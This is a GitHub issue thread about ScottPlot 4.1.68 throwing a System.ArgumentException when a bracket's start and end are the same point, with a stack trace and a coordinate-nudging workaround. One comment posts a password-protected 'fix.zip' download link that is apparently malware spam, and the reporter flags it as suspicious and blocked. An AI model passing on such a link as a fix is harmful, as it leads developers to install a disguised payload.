### ISSUE TITLE
Calling Refresh() after adding bracket to a single point causes System.ArgumentException

### ISSUE THREAD

**Issue by IlyaMudritskiy** [ScottPlot/ScottPlot#4182]
**Issue:**
In my code it is possible that a bracket will be added to a single point.
After calling refresh on the FormsPlot an exception is thrown
```
An unhandled exception of type 'System.ArgumentException' occurred in System.Drawing.dll
Parameter is not valid.
```

**ScottPlot Version:**
ScottPlot, ScottPlot.WinForms 4.1.68

**Code Sample:**
I created my own class (due to UI requirements) that holds the FormsPlot:

```
public abstract class HeaderView<T> where T : Control
{
// Unnecessary props
    public T Control { get; private set; } // Here I store FormsPlot
// Unrelated code
```

Implementation:
```cs
public class PlotView : HeaderView<FormsPlot>
{
// Some code
public Bracket AddGetBracket(DataPoint start, DataPoint end, bool visibility = true)
{
    if (start.Name != end.Name) return null;

    if (start.IsNaN() || end.IsNaN()) return null;

    var bracket = Control.Plot.AddBracket(start.X, start.Y, end.X, end.Y, start.Name);
    bracket.IsVisible = visibility;

    Control.Refresh();
    Control.Plot.AxisAuto();

    return bracket;
 }
}
```
Here I keep the bracket so I can selectively set IsVisible property.

```cs
public class DataPoint
{
    public double X { get; set; }
    public double Y { get; set; }
}
```

When this set of parameters come into method:
DataPoint start = new DataPoint { X = 2.0, Y=3.0 };
DataPoint end = new DataPoint { X = 2.0, Y=3.0 };
Exception happens

**Comment by IlyaMudritskiy** [comment]
Here is the full StackTrace
 ```
 at System.Drawing.Graphics.RotateTransform(Single angle, MatrixOrder order)
   at System.Drawing.Graphics.RotateTransform(Single angle)
   at ScottPlot.Plottable.Bracket.Render(PlotDimensions dims, Bitmap bmp, Boolean lowQuality)
   at ScottPlot.Plot.RenderPlottables(Bitmap bmp, Boolean lowQuality, Double scaleFactor)
   at ScottPlot.Plot.Render(Bitmap bmp, Boolean lowQuality, Double scale)
   at ScottPlot.Control.ControlBackEnd.Render(Boolean lowQuality, Boolean skipIfCurrentlyRendering)
   at ScottPlot.FormsPlot.Refresh(Boolean lowQuality, Boolean skipIfCurrentlyRendering)
   at Opal.src.TTL.UI.UIElements.PlotView.Refresh() in C:\Code\Azure\Opal\src\TTL\UI\UIElements\PlotView.cs:line 242
   at Opal.src.TTL.UI.UIElements.PlotView.AddGetBracket(DataPoint start, DataPoint end, Boolean visibility) in C:\Code\Azure\Opal\src\TTL\UI\UIElements\PlotView.cs:line 91
   at Opal.Model.Screen.Tabs.ProcessTab.plotClusterID(List`1 feature, Boolean visibility) in C:\Code\Azure\Opal\src\TTL\Screen\Tabs\ProcessTab.cs:line 362
   at Opal.Model.Screen.Tabs.ProcessTab.cellDoubleClickHandler(DataGridViewCellEventArgs e, Int32 dsIdx) in C:\Code\Azure\Opal\src\TTL\Screen\Tabs\ProcessTab.cs:line 238
   at Opal.Model.Screen.Tabs.ProcessTab.Table_DS11_CellDoubleClick(Object sender, DataGridViewCellEventArgs e) in C:\Code\Azure\Opal\src\TTL\Screen\Tabs\ProcessTab.cs:line 199
   at System.Windows.Forms.DataGridView.OnCellDoubleClick(DataGridViewCellEventArgs e)
   at System.Windows.Forms.DataGridView.OnDoubleClick(EventArgs e)
   at System.Windows.Forms.Control.WmMouseUp(Message& m, MouseButtons button, Int32 clicks)
   at System.Windows.Forms.Control.WndProc(Message& m)
   at System.Windows.Forms.DataGridView.WndProc(Message& m)
   at System.Windows.Forms.Control.ControlNativeWindow.OnMessage(Message& m)
   at System.Windows.Forms.Control.ControlNativeWindow.WndProc(Message& m)
   at System.Windows.Forms.NativeWindow.DebuggableCallback(IntPtr hWnd, Int32 msg, IntPtr wparam, IntPtr lparam)
   at System.Windows.Forms.UnsafeNativeMethods.DispatchMessageW(MSG& msg)
   at System.Windows.Forms.Application.ComponentManager.System.Windows.Forms.UnsafeNativeMethods.IMsoComponentManager.FPushMessageLoop(IntPtr dwComponentID, Int32 reason, Int32 pvLoopData)
   at System.Windows.Forms.Application.ThreadContext.RunMessageLoopInner(Int32 reason, ApplicationContext context)
   at System.Windows.Forms.Application.ThreadContext.RunMessageLoop(Int32 reason, ApplicationContext context)
   at System.Windows.Forms.Application.Run(Form mainForm)
   at Opal.Program.Main() in C:\Code\Azure\Opal\Program.cs:line 17
```

**Comment by c0ffincolors** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by IlyaMudritskiy** [comment]
Very suspicious file and it is blocked by mediafire

**Comment by IlyaMudritskiy** [comment]
**Workaround**
If starting point and end point of the bracket are same (same X and Y values) - create 2 new points and shift the X value a bit.
I subtracted a small value from X for both points to keep brackets horizontal orientation:
```cs
if (start.Equals(end)) // Checks if Name, X and Y are same
{
    start.X -= 0.01;
    end.X += 0.01;
}
```

**Possible solution**
To check in the method if X and Y values point to the same point `(X1 == X2 and Y1 == Y2)`
```cs
public void Render(PlotDimensions dims, Bitmap bmp, bool lowQuality = false)
{
    if (!IsVisible)
        return;

    using var gfx = GDI.Graphics(bmp, dims, lowQuality);
    using var pen = GDI.Pen(Color, LineWidth);
    using var brush = GDI.Brush(Color);
    using var font = GDI.Font(Font);

    var v = new Vector2((float)(X2 - X1), (float)(Y2 - Y1)); Before building the vector, check if X1,2 and Y1,2 equal each other
```

**Comment by swharden** [comment]
Hi @IlyaMudritskiy, thanks for sharing this workaround! 🚀 

It's a bit hard to understand exactly what's going on here and a screenshot or animated GIF could really help https://www.screentogif.com/ but either way it sounds like you got this one figured out 👍
